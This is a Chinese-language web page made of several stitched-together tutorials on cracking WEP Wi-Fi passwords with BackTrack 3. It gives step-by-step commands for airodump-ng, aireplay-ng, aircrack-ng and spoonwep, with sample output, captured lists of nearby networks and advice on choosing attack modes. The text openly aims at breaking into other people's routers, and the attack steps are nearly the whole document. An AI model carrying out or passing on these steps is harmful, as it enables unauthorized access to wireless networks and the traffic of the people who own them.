U盘版BT3教程破解wep密码

方便,快捷简单

光盘版BT3, 大概694MB,直接刻盘,然后用光盘引导,即可进入bt3,连接为:

http://ftp.heanet.ie/mirrors/backtrack/bt3-final.iso

U盘版Bt3,大概783MB,连接为:

http://cesium.di.uminho.pt/pub/backtrack/bt3final_usb.iso

准备工作:一张1G以上的U盘,或是SD卡,或是TF卡,当然,TF或SD卡的话,你要有读卡器才能

在电脑上读出来,

建议将U盘格式化成FAT32,这样比较节省空间,至于为什么节省空间,FAT32与FAT格式的比较

请您自己百度去,这里不多说了

格式化完成后,此U盘为空的U盘

插入到电脑USB口

1.下载U盘版bt3的文件

地址为:http://cesium.di.uminho.pt/pub/backtrack/bt3final_usb.iso

文件大概为 783MB

2.将此ISO文件加载到虚拟光驱中,在虚拟光驱中,得到如下文件:

Snap1.jpg

当然,你也可以用winrar解压到目录中,估计应该没啥问题,因为空间问题,我就不想解压了

我是直接加栽到虚拟光驱来用的,省空间,无需解压

3.将虚拟光驱中的文件也就是BT3,BOOT这两件文件夹copy到U盘中去

Snap2.jpg

4.点击开始-运行,输入CMD, 然后回车,进入命令行模式

Snap4.jpg

输入U盘的盘符,我的为I:,然后回车

输入 cd boot 回车

输入 bootinst.bat 回车,就会开始制作BT3

setup1.JPG

开始制作时,会出现这样的画面,大概意思就是,此操作将会重写U盘的MBR(即引导区),如果此分区是您的一个硬盘上的分区,那您的Windows系统将会启动不了,请小心,按X键中止操作,按其他任意键继续制作

我就是在U盘上操作的,所以不用理会,按任意键就可以了

setup2.JPG

上面的图,是制作完成后的提示,设置引导记录成功,按任意键退出制作

制作的过程很快,大概不到十秒,其他,他只是重新写了一下U盘的引导区

就OK了

到此为止,此U盘就可以引导系统进去bt3了

然后,升级下SPOONWEP2版本

上面ISO文件中的SPOONWEP版本太低,我把SPOONWEP2.lzm上传到blog里面了;大家也可以到CSDN上面去下载;

这个文件拷贝粘贴到U盘的BT3\modules\即可

当然,您的电脑如何设置成U盘启动就是您的问题了,我的是USBHDD启动的

----------------------------------------------------我是下流的分割线------------------------------------------------------

破解:引导系统进入BT3的选择画面,选择后面带有KDE的BT3即可,至于为什么选择这个

KDE是啥东西,我不知道,我也不想知道,如果您有性趣,请去自行百度

1.进入bt3桌面后,需要用到的就是命令行模式,其实也不难,注意,我们要启动

bt3的命令行状态,点击下面这个图标就会启动bt3的命令行状态

xiaobai0000000.JPG

就是上图中,画蓝圈的那个图标,我们所有的操作,都需要点击此图标

2.点击图标,进入命令行状态,输入命令:ifconfig -a

此命令,就是列出你电脑中的网卡,如果没有列出,那说明是不支持了

如果列出了,说明支持,也不一定能抓包

xiaobai16666666.JPG

上图就是,输入完命令,回车后看到的信息,注意图中画蓝圈的部分

那里显示的是你网卡的MAC码,我的就是 16-E6结尾的,可以看到

说明是支持我的网卡的,我的无线网卡是:intel 2915ABG ,BT3支持 2915ABG抓包内至的网卡是以 eth0, eth1,eth2.....此类的ID

USB的网卡是以 rausb0, rausb1,rausb2....此类的ID

下面,就要以eth1,我的内至网卡来抓包

2.再打开一个命令窗口,不知道怎么打开的,请去看文章上半部分

打开后,输入命令:airodump-ng -w 123 eth1

然后回车

注意:你自己的无线网卡的ID可能是 Rausb0, 或是 eth0, eth1

命令格式是:airodump-ng -w 123 <网卡ID>

即可

xiaobai2.jpg

输入命令,并回车,即可看到下面的信息:

xiaobai3.jpg

解释一下几个名称

BSSID:扫描到的无线路由的MAC地址,这个地址破解的时候需要用到

PWR:无线路由的信号强度

Beacons:向此路由发送的数据包的数量

#Data:网卡抓到的数据包的数量

CH: 无线路由所在的信道

ENC与CIPHER,这个是无线路由的加密方式

ESSID:无线路由的SSID的名称

我们这次举的例子,要破解的,必须为ENC:wep, CIPHER:wep,如上图的YEROC,就是非常合适的一个破解的对象

至于wpa加密的,由于不能抓到足够的数据包,不知道能不能破解,有兴趣的,你可以自己去试试

现在我们就要查看,那个无线路由的 #Data那一栏的数值变化比较快,数据包比较多,这样我们才能破解

我们看到,YEROC已经有17个数据包了,那我们就破解它

3.开始破解,再打开一个命令行模式,什么?不知道怎么打开命令行模式,抽S,自己看文章上半部分去

打开命令行窗口,运行:spoonwep

然后回车

xiaobai5.jpg

xiaobai6.jpg

打开spoonwep后

Victim MAC:这个栏里,输入我们要破解的无线路由的MAC码,也就是MAC地址

注意:是要破解的无线路由的MAC码,不是你无线网卡的MAC码

Net Card中,选择刚才运行 airodump-ng -w 123 eth1 这个命令中用到的无线网卡我的为eth1,我就选择了eth1

Channel:选择要破解的无线路由所在的信道,YEROC为六,我就选择了六

Inj Rate,为默认即可

Launch那个栏位,选择下拉的第二项0841 REPLAY ATTACK

然后点击 Launch按钮 ,就开始破解了

Yeroc.jpg

开始破解后,要抓到六万到十万的数据包,才能破解

我这个抓了四十分钟才抓够数据包,才破解的

此时,由于在运行,你看不到数据包的变化

没关系此时,再打开一个命令行窗口,输入 airodump-ng -w 123 eth1 然后回车你就会看到#Data 的数据包在不断的变化,因为运行spoonwep时,刚才那个airodump-ng 的窗口会数据显示

所以,开始破解后,再运行一次:airodump-ng -w 123 eth1 你就可以观察数据包数量变化的速度

也就会大概估计大概多长时间才能破解完成了

如果很慢,可以在睡前就开机来运算,进行破解

如果很快,在洗个澡的时间就可以破解了

这就需要你观察破解时,数据包变化的速度,然后再安排个时间来破解了

Over,全文完

BT3下无线破解实战

Intel3945ABG在BT3下无线网络密码破解

===================================

网络上关于无线网络破解的工具有很多,我手头上就有几个:WinaircrackPack, CommView_for_wifi, BT3。

这几个工具运行环境和界面都不同,但是都是基于airodump-ng这个工具的基础之上。其中WinaircrackPack和Commview_for_wifi运行在windows 环境中,要求无线网卡驱动支持网络监听。如果不支持监听,则不能成功,使用中会报错。

BT3是个封装好的linux平台,里面有很多黑客工具,其实就是个黑客工具包。关于如何启动进入BT3有很多介绍可以在网上查询,下面只介绍如何用其中的工具进行破解:

首先启动BT3,进入图形界面,运行一个命令窗口。

root@bt:~# ifconfig -a (查看本机网卡)

eth0 Link encap:Ethernet HWaddr 00:24:81:64:B7:3A

inet addr:192.168.1.105 Bcast:192.168.1.255 Mask:255.255.255.0

UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1

RX packets:39 errors:0 dropped:0 overruns:0 frame:0

TX packets:6 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:100

RX bytes:4774 (4.6 KiB) TX bytes:1974 (1.9 KiB)

Base address:0x4020 Memory:e4600000-e4620000

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:0 errors:0 dropped:0 overruns:0 frame:0

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

wlan0 Link encap:Ethernet HWaddr 00:1F:3C:D8:E9:E6

BROADCAST MULTICAST MTU:1500 Metric:1

RX packets:0 errors:0 dropped:0 overruns:0 frame:0

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

root@bt:~# airmon-ng start wlan0 (开始网络监听,error信息显示不支持或没有启动监

听状态)

Interface Chipset Driver

wlan0 Intel 3945 a/b/g iwl3945 - [phy0]

ERROR: Neither the sysfs interface links nor the iw command is available.

Please download and install iw from https://www.360docs.net/doc/5d11565301.html,/iw.tar.bz2

root@bt:~# modprobe -r iwl3945 (查询状态)

root@bt:~# modprobe ipwraw (启动监听状态)

root@bt:~# airmon-ng start wlan0 (监听状态启动,无线网卡名称变为wifi0)

Interface Chipset Driver

wifi0 Centrino a/b/g ipwraw-ng

一. 利用图形工具spoonwep

root@bt:~# spoonwep (启动spoonwep程序)

说明:该程序是个图形界面,在第一个页面里选择网卡(wifi0)、网卡类型(normal)、是否知

道要破解的无线网。点击下一步。

如果知道要破解的无线网,则在第二个页面里必须填写无线网的MAC地址。接下来就是等待自

动破解了,速度快的话很快就能看到破解的KEY了,^_^。

如果选择了不知道则程序自动扫描能发现的无线网,会比较慢。然后选择一个进行破解,和上

面一样。

二. 完全命令行程序

root@bt:~# airmon-ng start wifi0 6 (将监听网卡换成wifi0, 6 是无线频道,依据实际

情况调整)

Interface Chipset Driver

wifi0 Centrino a/b/g ipwraw-ng (monitor mode enabled)

root@bt:~# airodump-ng --ivs -w default -c 6 wifi0(抓数据包,default是无线网的名

称,根据实际情况调整。程序会在当前目录下生成default-01.ivs文件)

CH 6 ][ Elapsed: 14 mins ][ 2009-08-01 14:12

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:E0:94:46:D6 0 0 39 0 0 6 54. WPA2 CCMP PSK

00:13:46:50:C8:C9 0 0 48 0 0 6 54. WEP WEP default

00:21:27:6E:0E:A6 0 1 3047 16 0 6 54. WEP WEP worldwise

00:25:86:27:7B:A2 0 29 1996 0 0 6 54. WEP WEP TP-LINK_277BA0

00:1E:58:0F:AA:0A 0 39 5206 0 0 6 54. WEP WEP erichou

00:03:7F:BF:01:A2 0 0 549 0 0 6 54. WPA CCMP PSK ALPHA AFW-GR50

00:18:39:3A:58:9A 0 0 238 9 0 6 54 WEP WEP lillian

BSSID STATION PWR Rate Lost Packets Probes

00:13:46:50:C8:C9 00:24:2B:F5:23:82 0 0- 0 12 979 default

00:21:27:6E:0E:A6 00:1F:3B:D0:DE:23 0 0- 0 0 11

00:18:39:3A:58:9A 00:1B:63:C6:EB:60 -1 0- 0 0 6

(not associated) 00:13:02:51:DA:A9 0 0- 0 0 39 KFC-007

(not associated) 00:19:D2:4E:B6:C4 0 0- 0 0 102 azhi

(not associated) 00:18:F3:45:5D:8B 0 0- 0 0 21

TP-LINK_8DCFDC,linksys1

(运行另外一个命令窗口,运行破解)

root@bt:~# aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac wifi0

Sending Authentication Request

Authentication successful

Sending Association Request

Association successful :-)

这时,airodump-ng窗口的变化

这时候等Data有了1万5就可新开个命令窗口,用aircrack-ng来破解了。

root@bt:~# aircrack-ng default-01.ivs

Opening default-01.ivs

Read 31 packets.

# BSSID ESSID Encryption

1 00:1E:58:0F:AA:0A erichou Unknown

2 00:25:86:27:7B:A2 TP-LINK_277BA0 Unknown

3 00:21:27:6E:0E:A6 worldwise WEP (16 IVs) (实际情况中IVS

必须10000以上才可以破解)

4 00:13:46:50:C8:C9 default Unknown

5 00:03:7F:BF:01:A2 ALPHA AFW-GR50 Unknown

6 00:18:39:3A:58:9A lillian WEP (9 IVs) (实际情况中IVS

必须10000以上才可以破解)

Index number of target network ? 3

Opening default-01.ivs

Attack will be restarted every 5000 captured ivs.

Starting PTW attack with 16 ivs.

Aircrack-ng 1.0 rc1 r1085

[00:00:08] Tested 148993 keys (got 16 IVs)

KB depth byte(vote)

0 255/256 FF( 0) 1D( 220) 1E( 220) 3A( 220) 76( 220) 7C( 220) 7E( 220)

1 0/ 10 AA( 440) 08( 220) 3F( 220) 45( 220) 4F( 220) 76( 220) 7A( 220)

2 16/ 2 ED( 72) 10( 36) 14( 36) 19( 36) 2B( 36) 30( 36) 34( 36)

3 0/ 1 1A( 440) 06( 220) 20( 220) 32( 220) 3E( 220) 49( 220) 56( 220)

4 2/ 4 B6( 256) 0A( 220) 15( 220) 3D( 220) 6F( 220) 7C( 220) 83( 220)

Failed. Next try with 5000 IVs.(这种情况就是ivs太少,实际情况中IVS必须10000以上才可以破解)

破解无线路由密码(如何破解无线路由密码)

请注意:部分ATI的显卡进入BT3(linux)系统可能会报错,这不属于光盘问题,请在网上下载ATI 显卡的补丁,或者在网上下载虚拟主机(VM),就可以直接在XP中破解,VISTA系统下,也会进

不了BT3系统,请在XP下尝试破解,感谢您对本款产品支持,如有疑问,请联系各地经销商进行咨询》

准备工作:

1 把电脑设置为光驱启动,U盘版设置为USB启动,如果你不知道如何设置请参考主板说明书,或者直接google一下,(现在很多电脑买回来默认开启光驱启动,所以你不设置说不定也可以)

2 请将BT3光盘放入光驱,重先启动电脑就可以的了,默认是选择第一项 BT

3 Graphics mode (KDE) 进入linux 系统,如果不选择会倒数30秒自动进入。

1》点击左下角第二个图标(黑色)开启一个窗口,输入:spoonwep 回车后10秒左右弹出spoonwep2程序:

NET CARD 网卡接口选择WLAN0

DRIVER 驱动选择NORMAL

MODE 模式选择UNKNOWN VICTIM

点NEXT 转到VICTIMS DISCOVERY窗口:

2》首先点击左上角下拉菜单选择FIXED CHAN

这里的CHAN HOPPING是全频段扫描

点击右上角LAUNCH 按钮 (点完后会变成ABORT ) 这时会弹出抓包窗口,可作为参考,也可不用理会。20秒左右程序会显示扫描到的信息,其中:

ESSID 路由广播名称

MAC 路由的MAC地址

CHAN 使用的频道

POW 信号强度

DATA (注意:这个数值一直为0基本无法破解,你可另寻时机等到有DATA再破)

CLIS 空白代表无客户端,打钩则代表有客户端

选择要攻击的目标路由,然后点SELECTION OK转到ATTACK PANEL窗口:

3》第一个下拉菜单有4个选项,后面3个都可作为无客户端攻击模式,其中:

ARP REPLAY ATTACK(有客户端时用)

P0841 REPLAY ATTACK (次次选)

CHOPCHOP & FORGEATTACK(次选)

FRAGMENTATION & FORGE ATTACK(首选)

第二个下拉菜单有3个选项,其中:

??? LENGTH (不指定加密位数,首选)

128 BITS LENGTH(指定128位加密,次次选)

64 BITS LENGTH (指定64位加密,次选)

两个下拉菜单右边的Inj Rate是每秒发包数量,选默认的600即可。

选择好2个下拉菜单,点击左边 LAUNCH按钮开始自动破解,破解速度和信号强度成正比,信号越强,需要的时间越短,这点还请阁下来做尝试!

下面实战破别人的路由(有客户端模式)选了个最国内最常见的 TP-LINK

注:有客户端模式比无客户端成功率要高。

选中打算破解的路由,下面会显示当前所有连接到这个路由的合法客户端,选择一个 POWER 和PACKETS 都比较高的客户端,最后点SELEETION OK转到

ATTACK PANE L 窗口选中ARP REPLAY ATTACK

点击LAUNCH,之后的工作是全自动的,直到出现WEP Key,此路由密码宣告破解。

最下面的WEP Key既是密码在windows下输入2324252627即可,无需输入冒号。

相关文档
最新文档